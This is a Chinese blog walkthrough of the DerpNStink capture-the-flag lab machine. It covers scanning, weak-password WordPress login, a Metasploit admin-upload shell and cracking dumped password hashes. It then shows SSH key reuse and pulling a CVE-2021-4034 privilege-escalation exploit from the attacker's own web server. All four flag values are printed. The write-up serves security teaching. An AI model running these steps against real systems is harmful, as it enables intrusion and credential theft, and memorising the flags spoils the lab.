DerpNStink靶机复现

已于 2024-08-05 21:42:23 修改
阅读量536 收藏 5
点赞数 19
文章标签: 网络安全
于 2024-08-05 21:40:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52956666/article/details/140937704
版权

靶机设置

设置网卡为NAT模式

靶机IP发现

nmap 192.168.112.0/24

靶机IP为192.168.112.165

目录扫描

发现存在80端口开放,进行目录扫描

dirsearch 192.168.112.165

访问浏览器(第一个flag)

发现没有什么有价值的东西

F12查看页面源码,发现存在flag

flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)

发现/webnotes/info.txt

拼接访问

我们需要更改host文件来确保接下来的访问

vim /etc/hosts

目录拼接

拼接/robots.txt

发现可拼接的两个目录

拼接/php/

无法访问

拼接/temporary/

没什么信息

拼接/php/phpmyadmin/

发现了后台登陆页面

输入账号admin,密码admin弱口令登陆失败

dirb扫描发现了 http://derpnstink.local/weblog/wp-admin/

登陆弱口令爆破

账号:admin

密码:admin

登陆成功

发现是wordpress框架,尝试msfgetshell

getshell

msfconsole 开启环境

search wp_admin 查看与wordpress登陆相关的exp进行利用

use 0 利用查找到的这个exp

show options修改对应配置

show option

set rhosts 192.168.112.165 设置目标ip

set targeturi /secret/

set username admin

set password admin

run

拿到meterperter后获取交互式shell

shell

python -c 'import pty; pty.spawn("/bin/bash")'

getshell成功

提权(第二三四个flag)

cd ../../.. ---来到/var/www/html/weblog目录枚举信息!

查看wp-config.php文件中password的上下10行内容

grep -10 "password" -rn wp-config.php

mysql -uroot -pmysql

use wordpress

show tables;

select user_login,user_pass from wp_users;

kali进行john破解

发现密码wedgie57

账号:unclestinky

登陆后台

登陆成功

发现第二个flag

flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

查看用户 cd /home

ls

发现stinky

尝试ssh连接被拒绝

尝试ftp登陆成功

网页尝试拼接 Index of ftp://192.168.19.175/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/

发现file.key.txt文件

chmod 400 key.txt

cd .ssh

echo "PubkeyAcceptedKeyTypes +ssh-rsa" >config

进行ssh连接 ssh -i key.txt stinky@192.168.112.165

登陆成功

查看有无flag

cd Desktop

ls

cat flag.txt

flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)

python -m http.server kali开启远程服务

在反弹的shell中,进入tmp目录,从kali的web端wget下来cve-2021-4034-poc.c

提权成功

拿到第四个flag

cd Desktop

ls

cat flag.txt

flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)

CcHKer
关注
  • 19
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
小白的靶机-VulnHub-DerpNStink
wo41ge的博客
12-17 285
继续 继续 淦靶机 靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 目标:得到root权限&找到四个flag.txt ok 开始操作了 开机界面就是个这 轻车熟路 的搞一下 找到了此次CTF目标计算机IP地址:192.168.120.136 综合信息 21端口--FTP 22端口--SSH 80端口--HTTP 优先看看80端口 直接访问 F12找一找 作者可太行了 这不就有了吗 flag1=52E37291AEDF6A46D7D
self xss+csrf dvwa靶机复现
qq_52016943的博客
08-17 261
self XSS+CSRF
Vulnhub:Derpnstink靶机渗透
m0_62008601的博客
12-26 1204
渗透学习
DerpNStink靶机
zdd1453691081的博客
08-07 402
【代码】DerpNStink靶机
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix2-WalkThrough 靶机复现 本文将对 Kioptrix2 靶机复现的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,...
永恒之蓝复现kaliwin7
07-19
### 恒之蓝漏洞复现:Kali Linux 攻击 Windows 7 #### 实验背景及目的 “永恒之蓝”(EternalBlue)是一种针对 Windows 操作系统的严重漏洞,该漏洞允许攻击者在无需用户交互的情况下实现远程代码执行。本次实验...
PWN靶机环境 网络安全
05-23
PWN靶机环境
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8369
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
AuthBWC-0.3.3-py3-none-any.whl.zip
08-07
AuthBWC-0.3.3-py3-none-any.whl.zip
音视频剪辑库moviepy及其应用
最新发布
08-07
一些用moviepy库处理编辑视频的代码。主要包括:视频与视频之间的格式转换、视频提取音频、文本/颜色/遮罩剪辑、混剪、文字/转场切换特效及其与matplotlib、numpy创建动画的一些简单例子。
springboot510人职匹配推荐系统.zip
08-07
随着科学技术的飞速发展,各行各业都在努力与现代先进技术接轨,通过科技手段提高自身的优势;对于人职匹配推荐系统当然也不能排除在外,随着网络技术的不断成熟,带动了人职匹配推荐系统,它彻底改变了过去传统的管理方式,不仅使服务管理难度变低了,还提升了管理的灵活性。这种个性化的平台特别注重交互协调与管理的相互配合,激发了管理人员的创造性与主动性,对人职匹配推荐系统而言非常有利。 本系统采用的数据库是Mysql,使用SpringBoot框架开发,运行环境使用Tomcat服务器,ECLIPSE 是本系统的开发平台。在设计过程中,充分保证了系统代码的良好可读性、实用性、易扩展性、通用性、便于后期维护、操作方便以及页面简洁等特点。
mtk芯片刷写改串软件10.1952.0.03.zip
08-07
ModemMeta 仅支持在联发科芯片组上运行的设备,无论是智能手机还是平板电脑。它不适用于联发科以外的芯片组设备。 Redmi NOTE 10 PRO 修复IMEI ENG ROM解决方案 1-通过SP_Flash_Tool_v5.2208_Win工具选择 格式化并下载 固件 2-关闭手机 3-用软件重启到 META mode 4-打开ModemMeta 5-连接手机并插入USB电缆 6-按加载DB选择固件附带的BP文件,然后选择IMEI下载并写入IMEI MEID 完成。 更多信息:https://blog.csdn.net/FL1768317420/article/details/140994208
adb常用命令合集脚本
08-07
adb常用命令合集脚本
C# 基础语法教程,简明实用
08-07
C# 基础语法教程,简明实用。
电子图书资源服务系统是一款基于 Java Swing 的 C-S 应用
08-07
电子图书资源服务系统是一款基于 Java Swing 的 C-S 应用,旨在提供电子图书资源一站式服务,可从系统提供的图书资源中直接检索资源并进行下载。.zip优质项目,资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松copy复刻,拿到资料包后可轻松复现出一样的项目。 本人系统开发经验充足,有任何使用问题欢迎随时与我联系,我会及时为你解惑,提供帮助。 【资源内容】:包含完整源码+工程文件+说明(若有),项目具体内容可查看下方的资源详情。 【附带帮助】: 若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步。 【本人专注计算机领域】: 有任何使用问题欢迎随时与我联系,我会及时解答,第一时间为你提供帮助,CSDN博客端可私信,为你解惑,欢迎交流。 【适合场景】: 相关项目设计中,皆可应用在项目开发、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面中 可借鉴此优质项目实现复刻,也可以基于此项目进行扩展来开发出更多功能 【无积分此资源可联系获取】 # 注意 1. 本资源仅用于开源学习和技术交流。不可商用等,一切后果由使用者承担。 2. 部分字体以及插图等来自网络,若是侵权请联系删除。积分/付费仅作为资源整理辛苦费用。
情人节主题网站开发基础教程.md
08-07
情人节,一个充满爱意与浪漫的节日,是表达情感、分享甜蜜的绝佳时机。本教程将引导您从零开始,开发一个以情人节为主题的网站,让您能够在这个特别的日子里,为情侣们提供一个展示他们爱情故事的平台。
如何derpnstink靶机渗透,大学毕业作业
06-10
如果您是在大学毕业作业的框架下进行derpnstink靶机的渗透测试,那么您应该首先了解derpnstink靶机的网络架构和安全策略,以及您的渗透测试目标和范围。您需要制定一个详细的计划,包括测试方法、工具和技术,以及测试的时间和资源等。在进行渗透测试之前,确保您已经获得了授权,遵守了相关的法律和道德规范,并且已经得到了derpnstink靶机的所有者或管理员的同意。 在渗透测试过程中,您可以使用一些工具和技术来测试系统的安全性,例如漏洞扫描工具、端口扫描工具、密码破解工具等。您还可以使用社会工程学等技术来测试系统的人为安全漏洞。在测试过程中,您需要记录测试结果和发现的漏洞,并及时向derpnstink靶机的所有者或管理员报告和提供建议和解决方案。 需要注意的是,渗透测试需要严格遵守法律和道德准则,不能对他人造成损害或威胁其安全和隐私。同时,您应该保护好测试过程中获得的敏感信息,以避免泄露和滥用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值